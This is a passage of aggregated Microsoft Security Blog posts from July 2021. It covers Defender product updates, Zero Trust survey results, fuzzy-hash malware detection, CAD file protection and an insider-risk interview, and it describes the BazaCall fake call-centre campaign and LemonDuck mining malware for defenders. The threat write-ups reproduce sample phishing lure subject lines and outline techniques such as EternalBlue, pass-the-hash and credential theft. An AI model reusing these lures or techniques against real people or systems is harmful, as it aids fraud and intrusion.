Today’s threat environment is complex, and the endpoint continues to be a top attack vector. We recently released improvements and updates to the evaluation lab in Microsoft Defender for Endpoint to include new simulations by SafeBreach for attack campaigns such as Solorigate and Carbanak+FIN7, enabling security teams to better prepare for these types of advanced threats.

Robust prevention is a necessary first step in securing your organization. For that reason, we’re excited to share new device control capabilities for USB printing and removable storage to help organizations add additional layers of protection to their endpoints. We’ve also been extending our preventative capabilities across platforms, and the general availability of threat and vulnerability management for Linux adds to our existing support for macOS and Windows.

Finally, when responding to a potential threat, time is of the essence; so, we’ve focused on enabling security teams to scale their capabilities for more rapid investigations and response. Giving security teams the ability to download quarantined files without getting the user involved can dramatically speed up an investigation. In addition, our new live response API enables forensic evidence to be gathered as soon as suspicious activity is identified on a device.

Microsoft Azure Defender for IoT

Azure Defender for IoT is an agentless, network-layer monitoring solution for identifying unmanaged IoT and operational technology (OT) assets, prioritizing vulnerability mitigations, and continuously monitoring for threats using IoT/OT-aware behavioral analytics. Available for either on-premises or cloud-connected environments, Azure Defender for IoT is tightly integrated with Azure Sentinel and supports third-party security operation center (SOC) tools such as Splunk, IBM QRadar, and ServiceNow.

We’re happy to announce that IoT/OT-specific threat intelligence can now be continuously delivered to cloud-connected sensors—reducing manual efforts and helping to ensure constant security. Coming soon: mapping of threats to tactics and techniques for MITRE ATT&CK for industrial control systems (ICS). Plus be sure to attend our Black Hat session featuring Azure Defender for IoT security researchers describing BadAlloc, the critical RCE vulnerability they uncovered in widely used IoT/OT real-time operating systems (RTOS), libraries, and SDKs.

App governance add-on to Microsoft Cloud App Security

App governance is a new add-on capability to Microsoft Cloud App Security that can be used to monitor, protect, and govern OAuth-enabled third-party apps on Microsoft 365 platform that use Microsoft Graph API. The new app governance add-on, now in preview, helps security administrators and analysts to quickly identify, alert, and prevent risky app behaviors from Microsoft 365 compliance center.

Learn more about the new app governance add-on:

Azure Key Vault Managed hardware security modules (HSM)

Azure Key Vault Managed HSM is a fully managed, highly available, single-tenant, standards-compliant cloud service that enables customers to safeguard cryptographic keys for their cloud applications using FIPS 140-2 Level 3 validated HSMs.

Always Encrypted

Always Encrypted protects sensitive data (credit card or social security numbers) stored in Azure SQL Database or SQL Server databases, allowing our customers to encrypt data inside client applications without revealing the encryption keys to the database engine. Meaning, Always Encrypted maintains a secure separation between those who own the data and those who manage it. The general availability of Always Encrypted strengthens our promise that Microsoft Azure offers the broadest support for confidential computing. Along with Azure Confidential Ledger and support for Kubernetes and other confidential containers, Always Encrypted gives our customers the broadest range of options for making their virtual machines (VMs), applications, and services confidential.

Learn more about Microsoft Security solutions

We look forward to joining you at Microsoft virtual booth 2340 for Black Hat 2021, July 31 to August 5, 2021.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Microsoft at Black Hat 2021: Sessions, bug bounty updates, product news, and more appeared first on Microsoft Security Blog.

Categories: Microsoft

BazaCall: Phony call centers lead to exfiltration and ransomware

Microsoft Malware Protection Center - Thu, 07/29/2021 - 11:00am

Our continued investigation into BazaCall campaigns, those that use fraudulent call centers that trick unsuspecting users into downloading the BazaLoader malware, shows that this threat is more dangerous than what’s been discussed publicly in other security blogs and covered by the media. Apart from having backdoor capabilities, the BazaLoader payload from these campaigns also gives a remote attacker hands-on-keyboard control on an affected user’s device, which allows for a fast network compromise. In our observation, attacks emanating from the BazaCall threat could move quickly within a network, conduct extensive data exfiltration and credential theft, and distribute ransomware within 48 hours of the initial compromise.

BazaCall campaigns forgo malicious links or attachments in email messages in favor of phone numbers that recipients are misled into calling. It’s a technique reminiscent of vishing and tech support scams where potential victims are being cold-called by the attacker, except in BazaCall’s case, targeted users must dial the number. And when they do, the users are connected with actual humans on the other end of the line, who then provide step-by-step instructions for installing malware into their devices. Thus, BazaCall campaigns require direct phone communication with a human and social engineering tactics to succeed. Moreover, the lack of obvious malicious elements in the delivery methods could render typical ways of detecting spam and phishing emails ineffective.

Figure 1. The flow of a typical BazaCall attack, from the spam email to social engineering to the payload being downloaded and hands-on-keyboard attacks

The use of another human element in BazaCall’s attack chain through the abovementioned hands-on-keyboard control further makes this threat more dangerous and more evasive than traditional, automated malware attacks. BazaCall campaigns highlight the importance of cross-domain optics and the ability to correlate events in building a comprehensive defense against complex threats.

Microsoft 365 Defender orchestrates protection across domains to deliver coordinated defense. In the case of BazaCall, Microsoft Defender for Endpoint detects malware and attacker behavior resulting from the campaign, and these signals inform Microsoft Defender for Office 365 protections against related emails, even if these emails don’t have the typical malicious artifacts. Microsoft threat analysts who constantly monitor BazaCall campaigns enrich the intelligence on this threat and enhance our ability to protect customers.

In this blog post, we discuss how a recent BazaCall campaign attempts to compromise systems and networks through the mentioned human elements and how Microsoft defends against it.

Out with the links and attachments, in with the customer service phone numbers

BazaCall campaigns begin with an email that uses various social engineering lures to trick target recipients into calling a phone number. For example, the email informs users about a supposed expiring trial subscription and that their credit card will soon be automatically charged for the subscription’s premium version. Each wave of emails in the campaign uses a different “theme” of subscription that is supposed to be expiring, such as a photo editing service or a cooking and recipes website membership. In a more recent campaign, the email does away with the subscription trial angle and instead poses as a confirmation receipt for a purchased software license.

Unlike typical spam and phishing emails, BazaCall’s do not have a link or attachment in its message body that users must click or open. Instead, it instructs users to call a phone number in case they have questions or concerns. This lack of typical malicious elements—links or attachments—adds a level of difficulty in detecting and hunting for these emails. In addition, the messaging of the email’s content might also add an air of legitimacy if the user has been narrowly trained to avoid typical phishing and malware emails but not taught to be wary of social engineering techniques.

Figure 2. A typical BazaCall email, claiming that the user’s trial for a photo editing service will soon expire, and that they will be automatically charged. A fake customer service number is provided to help cancel the subscription.

Each BazaCall email is sent from a different sender, typically using free email services and likely-compromised email addresses. The lures within the email use fake business names that are similar to the names of real businesses. A recipient who then searches the business name online to check the email’s legitimacy may be led to believe that such a company exists and that the message they received has merit.

Some sample subject lines are listed below. They each have a unique “account number” created by the attackers to identify the recipients:

  • Soon you’ll be moved to the Premium membership, as the demo period is ending. Personal ID: KT[unique ID number]
  • Automated premium membership renewal notice GW[unique ID number]
Categories: Microsoft

Zero Trust Adoption Report: How does your organization compare?

Microsoft Malware Protection Center - Wed, 07/28/2021 - 12:00pm

From the wide adoption of cloud-based services to the proliferation of mobile devices. From the emergence of advanced new cyberthreats to the recent sudden shift to remote work. The last decade has been full of disruptions that have required organizations to adapt and accelerate their security transformation. And as we look forward to the next major disruption—the move to hybrid work—one thing is clear: the pace of change isn’t slowing down.

In the face of this rapid change, Zero Trust has risen as a guiding cybersecurity strategy for organizations around the globe. A Zero Trust security model assumes breach and explicitly verifies the security status of identity, endpoint, network, and other resources based on all available signals and data. It relies on contextual real-time policy enforcement to achieve least privileged access and minimize risks. Automation and machine learning are used to enable rapid detection, prevention, and remediation of attacks using behavior analytics and large datasets.

Early adopters are seeing the benefits—organizations operating with a Zero Trust mindset across their environments are more resilient, responsive, and protected than those with traditional perimeter-based security models.

Zero Trust adoption is accelerating

Today, we are publishing our Zero Trust Adoption Report 2021. In this report, we surveyed or interviewed more than 1,200 security decision-makers over a 12-month timeframe about their Zero Trust adoption journey. Highlights from our research include:

  1. Zero Trust is now the top security priority. 96 percent of security decision-makers state that Zero Trust is critical to their organization’s success. Now that it’s been proven, the future of security firmly includes an emphasis on Zero Trust. When asked for top reasons of Zero Trust adoption, organizations cite increased security and compliance agility, speed of threat detection and remediation, and simplicity and availability of security analytics.
  2. Familiarity and adoption are growing rapidly. 90 percent of the security decision-makers we surveyed are familiar with Zero Trust and 76 percent are in the process of implementation—an increase from the last year of 20 percent and 6 percent, respectively.
  3. Hybrid work is driving adoption. The shift to hybrid work, accelerated by COVID-19, is also driving the move towards broader adoption of Zero Trust with 81 percent of organizations having already begun the move toward a hybrid workplace. Zero Trust will be critical to help maintain security amid the IT complexity that comes with hybrid work.
  4. More than half believe they’re ahead of their peers. 52 percent say that they are ahead of where they planned to be in their Zero Trust adoption, and 57 percent believe they are ahead of other organizations. It’s clear that the last 18 months have had a significant impact on adoption and organizations are getting more confident and efficient in their efforts.
  5. Zero Trust will remain a top priority with additional budget expected. More than half of respondents expect the relative importance of their Zero Trust strategy to increase by 2023. And not surprisingly, 73 percent expect their Zero Trust budget to increase. As organizations realize the additional benefits of Zero Trust and leaders continue to pull ahead, we expect to see an increase in these numbers.

This report showcases the Zero Trust adoption progress for organizations across diverse markets and industries. We hope that this research can help you accelerate your own Zero Trust adoption strategy, uncover the collective progress and prioritizations of your peers, and gain insights into the future state of this rapidly evolving space.

Read the full Microsoft Zero Trust Adoption Report for full details.

Additional resources

For an in-depth look at our latest updates that will help accelerate your Zero Trust journey, check out Vasu Jakkal’s blog, How to secure your hybrid work world with a Zero Trust approach, from earlier this month.

For technical guidance, visit our Zero Trust Guidance Center, a repository of information that provides specific guidance on implementing Zero Trust principles across their identities, endpoints, data, applications, networks, and infrastructure.

Check out the Microsoft Zero Trust Assessment tool to help you determine where you are in your Zero Trust implementation journey and offer action items to help reach key milestones.

For more information about Microsoft Zero Trust, please visit our website, and check out our deployment guides for step-by-step technical guidance.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Zero Trust Adoption Report: How does your organization compare? appeared first on Microsoft Security Blog.

Categories: Microsoft

Combing through the fuzz: Using fuzzy hashing and deep learning to counter malware detection evasion techniques

Microsoft Malware Protection Center - Tue, 07/27/2021 - 12:00pm

Today’s cybersecurity threats continue to find ways to fly and stay under the radar. Cybercriminals use polymorphic malware because a slight change in the binary code or script could allow the said threats to avoid detection by traditional antivirus software. Threat actors customize their wares specific to their target organizations to increase their chances of breaking into and moving laterally through an entire corporate network, exfiltrating data, and leaving with little or no trace. The underground economy is rife with malware builders, Trojanized versions of legitimate applications, and other tools and services that allow malware operators to deploy highly evasive malware.

As the number of threats seen in the wild continues to increase exponentially, the continued evolution and innovation of their evasion tactics create a scenario where most malware is seen only once. Therefore, in today’s threat landscape, security solutions should no longer be just about the number of unique malware they can detect. Instead, they should deliver durable solutions that can defend against existing as well as future attacks. This requires comprehensive visibility into threats, coupled with the ability to process vast amounts of data. Microsoft 365 Defender provides such a capability using its cross-domain optics and the transformation of data into actionable security information through innovative applications of AI and machine learning methodologies.

We have previously discussed how we apply deep learning in detecting malicious PowerShell, exploring new approaches to classify malware, and in detecting threats via the fusion of behavior signals. In this blog post, we discuss a new approach that combines deep learning with fuzzy hashing. This approach utilizes fuzzy hashes as input to identify similarities among files and to determine if a sample is malicious or not. Then, a deep learning methodology inspired by natural language processing (NLP) better identifies similarities that actually matter, thus improving detection quality and scale of deployment.

This model aims to improve the overall accuracy of classifying malware and continue closing the gap between malware release and eventual detection. It can detect and block malware at first sight, a critical capability in defending against the wide range of threats, including sophisticated cyberattacks.

Case study: New GoldMax malware blocked at first sight

In March this year, Microsoft 365 Defender successfully blocked a file that would later be confirmed as a variant of the GoldMax malware. GoldMax, a command-and-control backdoor that persists on networks as a scheduled task impersonating systems management software, is part the of tools, tactics, and procedures (TTPs) of NOBELIUM, the threat actor behind the attacks against SolarWinds in December 2020.

Microsoft was able to proactively defend its customers from this newly discovered GoldMax variant because it leveraged two main technologies: fuzzy hashing, which serves as the input, and deep learning techniques inspired by NLP and computer vision, among others.

The earliest GoldMax sample, which Microsoft detects as Trojan:Win64/GoldMax.A!dha, was first submitted on VirusTotal in September 2020. While the new file was confirmed to be GoldMax variant in June 2021, or three months after Microsoft first blocked it, we started defending customers as soon as we saw it. As seen in the screenshots below, the new file’s TLSH and SSDEP hashes—the fuzzy hashes exposed on VirusTotal—are observably similar to the first GoldMax variant. Both files also have the exact ImpHash and file size, further supporting our initial conclusion that the second file is also part of the GoldMax family.

Figure 1. File properties of the first GoldMax variant (top) and the new file detected in March (bottom) (from VirusTotal)

In the next sections, we discuss fuzzy hashes and how we use them in conjunction with deep learning to detect new and unknown threats.

Understanding fuzzy hashes

Hashing has become an essential technique in malware research literature and beyond because its output—hashes—are commonly used as checksums or unique identifiers. For example, it is common practice to use SHA-256 cryptographic hash to query a knowledge database like VirusTotal to determine whether a file is malicious or not. The first antivirus products operated this way before antivirus signatures existed.

However, to identify or detect similar malware, traditional cryptographic hashing poses a challenge because of its inherent property called cryptographic diffusion, whose purpose is to hide the relationship between the original entity and the hash so that these are still considered one-way functions. With this property, even a minimal change in the original entity—in this case, a file—yields a radically different, undetected hash.

Below are screenshots that illustrate this principle. The word change in the text file and the resulting change in the MD5 hash represent the effect of changes in binary content of other files:

Figure 2. Example of cryptographic hashing

Fuzzy hashing breaks the aforementioned cryptographic diffusion while still hiding the relationship between entity and hash. In doing so, this method provides similar resulting hashes when given similar inputs. Fuzzy hashing is the key to finding new malware that looks like something we have seen previously.

Like cryptographic hashes, there are several algorithms to calculate a fuzzy hash. Some examples are Nilsimsa, TLSH, SSDEEP, or sdhash. Using the previous text files example, below is a screenshot of their SSDEEP hashes. Note how observably similar these hashes are because there is only a one-word difference in the text:

Figure 3. Example of fuzzy hashing

The main benefit of fuzzy hashes is similarity. Since these hashes can be calculated on several parts or the entirety of a file, we can focus on hash sequences that are like one another. This is important in determining the maliciousness of a previously undetected file and in categorizing malware according to type, family, malicious behavior, or even related threat actor.

Fuzzy hashes as “natural language” for deep learning

Deep learning in its many applications has recently been remarkable at modeling natural human language. For example, convolutional architectures, recursive architectures like Gated Recurrent Units (GRUs) or Long Short Term Memory networks (LSTMs), and most recently attention-based networks like all the variants of Transformers have been proven to be state-of-the-art in tackling human language tasks like sentiment analysis, question answering, or machine translation. As such, we explored if similar techniques can be applied to computer languages like binary code, with fuzzy hashing as an intermediate step to reduce sequence complexity and length of the original space. We discovered that segments of fuzzy hashes could be treated as “words,” and some sequences of such words could indicate maliciousness.

Architecture overview and deployment at scale

A common deep learning approach in dealing with words is to use word embeddings. However, because fuzzy hashes are not exactly natural language, we could not simply use pre-trained models. Instead, we needed to train our embeddings from scratch to identify malicious indicators.

Once with these embeddings, we attempted to do most things with a language deep neural network. We explored different architectures using standard techniques from literature, explored convolutions over these embeddings, attempted with multilayer perceptrons, and tried traditional sequential models (like the previously-mentioned LSTM and GRU) and attention-based networks (Transformers).

Figure 4. Architecture overview of the deep learning model using fuzzy hashes

We got fairly good results with most techniques. However, to deploy and enable this model to the Microsoft 365 Defender, we looked into other factors like inference times and the number of parameters in the network. Inference time ruled out the sequential models because even though they were the best in terms of precision or recall, they are the slowest to run inference on. Meanwhile, the Transformers we experimented on also yielded excellent results but had several million parameters. Such parameters will be too costly to deploy at scale .

That left us with the convolutional approach and multilayer perceptron. The perceptron yielded slightly better results between these two because the spatial adjacency intrinsically provided by the convolutional filters does not properly capture the relationship among the embeddings.

Once we had landed on a viable architecture, we used modern tools available to us that Microsoft continues to extend. We used Azure Machine Learning GPU capabilities to train these models at scale, then exported them to Open Neural Network Exchange (ONNX), which gave us the extra performance we needed to operationalize this at scale on Microsoft Defender Cloud.

Deep learning fuzzy hashes: Looking for the similarities that matter

A question that arises from an approach like this is: why use deep learning at all?

Adding machine learning allows us to learn which similarities on fuzzy hashes matter and which ones don’t. Additionally, adding deep learning and training on vast amounts of data increases the accuracy of malware classification and allows us to understand the minor nuances that differentiate legitimate software from its malware or Trojanized versions.

A deep learning approach also has its inherent benefits, one of which is creating big pre-trains on massive amounts of data. One can then reuse this model for different classification, clustering, and other scenarios by using its transfer learning properties. This is similar to how modern NLP approaches language tasks, like how OpenAI’s GPT3 solves question answering.

Another inherent benefit of deep learning is that one does not have to retrain the model from scratch. Since new data is constantly flowing into the Microsoft Defender Cloud, we can fine-tune the model with these incoming data to adapt and quickly respond to an ever-changing threat landscape.

Conclusion: Continuing to harness the immense potential of deep learning in security

Deep learning continues to provide opportunities to improve threat detection significantly. The deep learning approach discussed in this blog entry is just one of the ways we at Microsoft apply deep learning in our protection technologies to detect and block evasive threats. Data scientists, threat experts, and product teams work together to build AI-driven solutions and investigation experiences.

By treating fuzzy hashes as “words” and not mere codes, we proved that natural language techniques in deep learning are viable methods to solve the current challenges in the threat landscape. This change in perspective presents different possibilities in cybersecurity innovation that we are looking forward to exploring further.

Numerous AI-driven technologies like this allow Microsoft 365 Defender to automatically analyze massive amounts of data and quickly identify malware and other threats. As the GoldMax case study showed, the ability to identify new and unknown malware is a critical aspect of the coordinated defense that Microsoft 365 Defender delivers to protect customers against the most sophisticated threats.

Learn how you can stop attacks through automated, cross-domain security and built-in AI with Microsoft 365 Defender.

 

Edir Garcia Lazo

Microsoft 365 Defender Research Team

The post Combing through the fuzz: Using fuzzy hashing and deep learning to counter malware detection evasion techniques appeared first on Microsoft Security Blog.

Categories: Microsoft

How to protect your CAD data files with MIP and HALOCAD

Microsoft Malware Protection Center - Thu, 07/22/2021 - 2:00pm

This blog post is part of the Microsoft Intelligent Security Association guest blog series. Learn more about MISA.

Computer-aided design (CAD) files are used by design professionals in the manufacturing, engineering, architecture, surveying, and construction industries. These highly valuable files contain confidential information and form their core intellectual property (IP).

Loss of such proprietary information to an outsider or a competitor can have disastrous effects leading to a loss in sales, market share, and reduced profit margins. However, such industries often collaborate with other design partners or vendors or they share their design parts with smaller manufacturers. Product blueprints and designs are regularly exchanged, both within and outside the organization’s network boundaries. In such cases, there is a high possibility of a data leak.

Data loss or theft can occur in any one of the following ways:

  1. Every time you send a file to another person, a copy is usually made and stored online. Once the file leaves the organization there is no guarantee that it is safe unless it is adequately protected.
  2. Storing and transferring the file to another system.
  3. A malicious insider may have a copy of the file and the ability to share the information with an outsider, even after leaving the organization.
Microsoft Information Protection works where perimeter security fails

Organizations may use encryption programs, secure file transfer protocol, and other access control methods to prevent data leaks and data theft. However, once these files leave their original repository it is very difficult to keep track of their usage.

To solve this problem, organizations have invested in Microsoft Information Protection (MIP) an intelligent, unified, and extensible solution to protect sensitive data across your enterprise—in Microsoft 365 cloud services, on-premises, third-party software as a service (SaaS) applications, and more. MIP provides a unified set of capabilities to know your data, protect your data, and help prevent data loss across Microsoft 365 apps (such as Word, PowerPoint, Excel, and Outlook) and services (such as Teams, SharePoint, and Exchange).

When you have already invested in an excellent information protection system, it isn’t a prudent decision to go in for another information protection system. But what can be done to solve the above problem?

MIP and HALOCAD for secured digital collaboration at a global scale

SECUDE has integrated their HALOCAD solution with Microsoft’s MIP SDK which extends the data protection beyond the organization’s IT perimeter. HALOCAD not only integrates as a MIP SDK add-in into the content authoring environment but also works as an add-on into the content repository and implements information protection policies across supported repositories.

With over two decades of experience in the data security field, SECUDE has a track record of adding value to the MIP capabilities to SAP environments, especially when exporting sensitive information from SAP environments. HALOCAD helps to seamlessly leverage MIP labeling templates for CAD files and does so simply and cost-effectively. It also applies the label to the content repository where the engineering processes for storing and sharing CAD files are kept.

Let us look at a hypothetical scenario on how data collaboration happens between the engineering team and the external third party vendors and suppliers with HALOCAD and MIP:

In the above scenario, the design files move seamlessly across the supply chain with MIP sensitivity labels applied automatically and user privileges as defined by the organization.

Scenario 1 (Designer):

The user is the designer who owns the design files. Based on the user privilege defined, the designer can view, edit, copy, print, and export the files

Scenario 2 (Engineer):

The user is an engineer who consumes the design file shared with them by the engineering team. The engineer can view and edit the files. They can make modifications to the original file and share it. They do not have the privilege to copy, print, export, and use the snipping tool to make a copy.

Scenario 3 (Partner who has SECUDE solution):

In a typical manufacturing environment, the CAD drawings are shared with a lot of third-party partners and vendors across the supply chain for day-to-day operations. In this scenario, the partner who has purchased the SECUDE solution can only view the CAD files per the set privilege enforcement.

Scenario 4 (Unauthorized user):

If an unauthorized user outside of the organization tries to open the CAD drawings, the files are encrypted, and he will not be able to open the file.

Benefits of SECUDE’s HALOCAD
  1. HALOCAD extends the security templates provided by MIP to sensitive CAD files throughout the design lifecycle.
  2. HALOCAD applies sensitivity labels automatically during the check-out process without user engagement.
  3. HALOCAD preserves the extension of the file, allowing users to not see the difference and the workflow is not disrupted.
  4. An unauthorized user using an AutoCAD application without the HALOCAD extension tries to open a document, they will not be able to open the file through the extension is *.dwg.
  5. HALOCAD currently supports the following CAD applications:
    • Autodesk Inventor and AutoCAD
    • PTC Creo
    • Siemens NX and Solid Edge
  1. HALOCAD also supports the following PLM applications:
    • PTC Windchill
    • Siemens Teamcenter
    • SAP PLM/ECTR

For more information about the HALOCAD solution, please visit the SECUDE HALOCAD website. You can also find HALOCAD in Azure Marketplace.

Learn more

To learn more about the Microsoft Intelligent Security Association (MISA), visit our website where you can learn about the MISA program, product integrations, and find MISA members. Visit the video playlist to learn about the strength of member integrations with Microsoft products.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

Reference

The post How to protect your CAD data files with MIP and HALOCAD appeared first on Microsoft Security Blog.

Categories: Microsoft

A guide to balancing external threats and insider risk

Microsoft Malware Protection Center - Thu, 07/22/2021 - 1:00pm

The security community is continuously changing, growing, and learning from each other to better position the world against cyber threats. In the latest Voice of the Community blog series post, Microsoft Product Marketing Manager Natalia Godyla talks with Rockwell Automation Vice President and Chief Information Security Officer Dawn Cappelli. In this blog post, Dawn talks about the importance of including insider risk in your cybersecurity plan. 

Natalia: What is the biggest barrier that organizations face in addressing insider risk?

Dawn: The biggest barrier is drawing attention to insider risk. We heard about the ransomware group bringing down the Colonial Pipeline. We hear about ransomware attacks exposing organizations’ intellectual property (IP). We’re not hearing a lot about insider threats. We haven’t had a big insider threat case since Edward Snowden so that sometimes makes it hard to get buy-in for an insider risk program. But I guarantee insider threats are happening. Intellectual property is being stolen and systems are being sabotaged. The question is whether they are being detected—are companies looking?

Natalia: How do you assess the success of an insider risk program?

Dawn: First, we measure our success by significant cases. For instance, we have someone leaving the company to go to a competitor, we catch them copying confidential information that they clearly want to take with them, and we get it back.

Second, we measure success by looking at the team’s productivity. Everyone in the company has a risk score based on suspicious or anomalous activity as well as contextual data, for instance, they are leaving the company. Every day we start at the top of the dashboard with the highest risk and work our way down. We look at how many cases have no findings because that means we’re wasting time, and we need to adjust our risk models to eliminate false positives.

We also look at the reduction in cases because we focus a lot on deterrence, communication, and awareness, as well as cases by business unit and by region. We run targeted campaigns and training for specific business units or types of employees, regions, or countries, and then look at whether those were effective in reducing the number of cases.

Natalia: How does measuring internal threats differ from measuring external threats?

Dawn: From an external risk perspective, you need to do the same thing—see if your external controls are working and if they’re blocking significant threats. Our Computer Security Incident Response Team (CSIRT) also looks at the time to contain and the time to remediate. We should also measure how long it takes to respond and recover IP taken by insiders.

By the way, I like using the term “insider risk” instead of “insider threat” because we find that most suspicious insider activity we detect and respond to is not intentionally malicious. Especially during COVID-19, we see more employees who are concerned about backing up their computer, so they pull out their personal hard drive and use it to make a backup. They don’t have malicious intent, but we still must remediate the risk. Next week they could be recruited by a competitor, and we can’t take the chance that they happen to have a copy of our confidential information on a removable media device or in personal cloud storage.

Natalia: How do you balance protecting against external threats and managing insider risks?

Dawn: You need to consider both. You should be doing threat modeling for external threats and insider risks and prioritizing your security controls accordingly. An insider can do anything an external attacker can do. There was a case in the media recently where someone tried to bribe an insider to plug in an infected USB drive to get malware onto the company’s network or open an infected attachment in an email to spread the malware. An external attacker can get in and do what they want to do much easier through an insider.

We use the National Institute of Standards and Technology (NIST) Cybersecurity Framework (CSF) for our security program, and we use it to design a holistic security program that encompasses both external and insider security risks. For example, we identify our critical assets and who should have access to them, including insiders and third parties. We protect those assets from unauthorized access—including insiders and outsiders. We detect anomalous or suspicious behavior from insiders and outsiders. We respond to all incidents and recover when necessary. We have different processes, teams, and technologies for our insider risk program, but we also use many of the same tools as the CSIRT, like our Security Information and Event Management (SIEM) and Microsoft Office 365 tools.

Natalia: What best practices would you recommend for data governance and information protection?

Dawn: Don’t think about insider threats only from an IP perspective. There’s also the threat of insider cyber sabotage, which means you need to detect and respond to activities like insiders downloading hacking tools or sabotaging your product source code.

Think about it: an external attacker has to get into the network, figure out where the development environment is, get the access they need to compromise the source code or development environment, plant the malicious code or backdoor into the product—all without being detected. It would be a lot easier for an insider to do that because they know where the development environment is, they have access to it, and they know how the development processes work.

When considering threat types, I wouldn’t say that you need to focus more on cyber sabotage than IP; you need to focus on them equally. The mitigations and detections are different for IP theft versus sabotage. For theft of IP, we’re not looking for people trying to download malware, but for sabotage, we are. The response processes are also different depending on the threat vector.

Natalia: Who needs to be involved in managing and reducing insider risk, and how?

Dawn: You need an owner for your insider risk program, and in my opinion, that should be the Chief Information Security Officer (CISO). HR is a key member of the virtual insider risk team because happy people don’t typically commit sabotage; it’s employees who are angry and upset, and they tend to come to the attention of HR. Every person in Rockwell HR takes mandatory insider risk training every year, so they know the behaviors to look for.

Legal is another critical member of the team. We can’t randomly take people’s computers and do forensics for no good reason, especially in light of all the privacy regulations around the world. The insider risk investigations team is in our legal department and works with legal, HR, and managers. For any case involving personal information and any case in Europe, we go to our Chief Privacy Officer and make sure that we’re adhering to all the privacy laws. In some countries, we also have to go to the Works Council and let them know we’re investigating an employee. The security team is responsible for all the controls—preventive, detective—technology, and risk models.

Natalia: What’s next in the world of data regulation?

Dawn: Privacy is the biggest issue. The Works Councils in Europe are becoming stronger and more diligent. They are protecting the privacy of their fellow employees, and the privacy review processes make the deployment of monitoring technology more challenging.

In the current cyber threat environment, we must figure out how to get security and privacy to work together. My advice to companies operating in Europe is to go to the Works Councils as soon as you’re thinking about purchasing new technology. Make them part of the process and be totally transparent with them. Don’t wait until you’re ready to deploy.

Natalia: How will advancements like cloud computing and AI change the risk landscape?

Dawn: We have a cloud environment, and our employees are using it to develop products. From inception, the insider risk team worked to ensure that we’re always threat modeling the environment. We go through the entire NIST CSF for that cloud environment and look at it from both an external and insider risk perspective.

Companies use empirical, objective data to create and train AI models for their products. The question becomes, “Do you have controls to identify an insider who deliberately wants to bias your models or put something malicious into your AI models to make it go off course later?” With any type of threat, ask if an insider could facilitate this type of attack. An insider can do anything an outsider can do, and they can do it much easier.

Learn more

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post A guide to balancing external threats and insider risk appeared first on Microsoft Security Blog.

Categories: Microsoft

When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure

Microsoft Malware Protection Center - Thu, 07/22/2021 - 12:00pm

[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. Part 1 covers the evolution of the threat, how it spreads, and how it impacts organizations. Part 2 will be a deep dive on the attacker behavior and will provide investigation guidance.]

Combating and preventing today’s threats to enterprises require comprehensive protection focused on addressing the full scope and impact of attacks. Anything that can gain access to machines—even so-called commodity malware—can bring in more dangerous threats. We’ve seen this in banking Trojans serving as entry point for ransomware and hands-on-keyboard attacks. LemonDuck, an actively updated and robust malware that’s primarily known for its botnet and cryptocurrency mining objectives, followed the same trajectory when it adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.

LemonDuck’s threat to enterprises is also in the fact that it’s a cross-platform threat. It’s one of a few documented bot malware families that targets Linux systems as well as Windows devices. It uses a wide range of spreading mechanisms—phishing emails, exploits, USB devices, brute force, among others—and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns. For example, in 2020, it was observed using COVID-19-themed lures in email attacks. In 2021, it exploited newly patched Exchange Server vulnerabilities to gain access to outdated systems.

This threat, however, does not just limit itself to new or popular vulnerabilities. It continues to use older vulnerabilities, which benefit the attackers at times when focus shifts to patching a popular vulnerability rather than investigating compromise. Notably, LemonDuck removes other attackers from a compromised device by getting rid of competing malware and preventing any new infections by patching the same vulnerabilities it used to gain access.

In the early years, LemonDuck targeted China heavily, but its operations have since expanded to include many other countries, focusing on the manufacturing and IoT sectors. Today, LemonDuck impacts a very large geographic range, with the United States, Russia, China, Germany, the United Kingdom, India, Korea, Canada, France, and Vietnam seeing the most encounters.

Figure 1. Global distribution of LemonDuck botnet activity

In 2021, LemonDuck campaigns started using more diversified command and control (C2) infrastructure and tools. This update supported the marked increase in hands-on-keyboard actions post-breach, which varied depending on the perceived value of compromised devices to the attackers. Despite all these upgrades, however, LemonDuck still utilizes C2s, functions, script structures, and variable names for far longer than the average malware. This is likely due to its use of bulletproof hosting providers such as Epik Holdings, which are unlikely to take any part of the LemonDuck infrastructure offline even when reported for malicious actions, allowing LemonDuck to persist and continue to be a threat.

In-depth research into malware infrastructures of various sizes and operations provides invaluable insight into the breadth of threats that organizations face today. In the case of LemonDuck, the threat is cross-platform, persistent, and constantly evolving. Research like this emphasizes the importance of having comprehensive visibility into the wide range of threats, as well as the ability to correlate simple, disparate activity such as coin mining to more dangerous adversarial attacks.

LemonDuck and LemonCat infrastructure

The earliest documentation of LemonDuck was from its cryptocurrency campaigns in May 2019. These campaigns included PowerShell scripts that employed additional scripts kicked off by a scheduled task. The task was used to bring in the PCASTLE tool to achieve a couple of goals: abuse the EternalBlue SMB exploit, as well as use brute force or pass-the-hash to move laterally and begin the operation again. Many of these behaviors are still observed in LemondDuck campaigns today.

LemonDuck is named after the variable “Lemon_Duck” in one of the said PowerShell scripts. The variable is often used as the user agent, in conjunction with assigned numbers, for infected devices. The format used two sets of alphabetical characters separated by dashes, for example: “User-Agent: Lemon-Duck-[A-Z]-[A-Z]”. The term still appears in PowerShell scripts, as well as in many of the execution scripts, specifically in a function called SIEX, which is used to assign a unique user-agent during botnet connection in attacks as recently as June 2021.

LemonDuck frequently utilizes open-source material built off of resources also used by other botnets, so there are many components of this threat that would seem familiar. Microsoft researchers are aware of two distinct operating structures, which both use the LemonDuck malware but are potentially operated by two different entities for separate goals.

